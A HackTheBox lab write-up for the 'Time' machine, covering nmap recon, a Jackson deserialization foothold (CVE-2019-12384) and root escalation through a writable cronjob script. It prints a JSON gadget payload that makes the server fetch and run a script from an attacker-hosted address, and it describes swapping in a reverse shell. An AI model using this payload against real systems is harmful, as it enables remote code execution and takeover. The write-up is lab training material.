Hackthebox Time WriteUp

Overview:

Time is a medium-level machine. First the web server running java scripts that has a vulnerable Jackson library for json deserialization. After got a shell, there is a cronjob that running as root privilege and has write access for the user. With all that being said, Let’s just jump in!

Reconnaissance:

root@kali:~/htb/boxes/time# nmap -T4 -A -p- -oA time -v 10.10.10.214
# Nmap 7.91 scan initiated Mon Oct 26 07:25:13 2020 as: nmap -T4 -A -p- -oA time -v 10.10.10.214
Nmap scan report for 10.10.10.214
Host is up (0.047s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0f:7d:97:82:5f:04:2b:e0:0a:56:32:5d:14:56:82:d4 (RSA)
|   256 24:ea:53:49:d8:cb:9b:fc:d6:c4:26:ef:dd:34:c1:1e (ECDSA)
|_  256 fe:25:34:e4:3e:df:9f:ed:62:2a:a4:93:52:cc:cd:27 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 7D4140C76BF7648531683BFA4F7F8C22
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

The Foothold:

Head over to port 80. And there is a Jso page.

Give it a random character for it to deserialize and see what will happen.

Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unexpected character ('`' (code 96)): expected a valid value (number, String, array, object, 'true', 'false' or 'null')

The error above indicates the server is running Jackson java script. Search related exploits and found blow one.

CVE-2019–12384

Jackson gadgets - Anatomy of a vulnerability

Create a payload named inject.sql as above screenshot form the exploit page. Then use python SimpleHttpserver hosting the payload and execute below strings for web server to execute the payload.

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.28:81/inject.sql'"}]"

PriEsc to root:

Ran linpeas and found there is a (/usr/bin/timer_backup.sh) cronjob running and the user pericles has write permission.

pericles@time:/home$ ls -l /usr/bin/timer_backup.sh
-rwxrw-rw- 1 pericles pericles 88 Apr  1 12:50 /usr/bin/timer_backup.sh
pericles@time:/home$ cat /usr/bin/timer_backup.sh
#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip

Run pspy to monitor all the running processes in the machine. It shows the root is executing the cronjob!

Chang the file to a reverse shell and let root to execute it.

Patch the Vulnerabilities:

1. Update the Jackson java script on the server.
2. Remove the timer_backup.sh cronjob on the machine.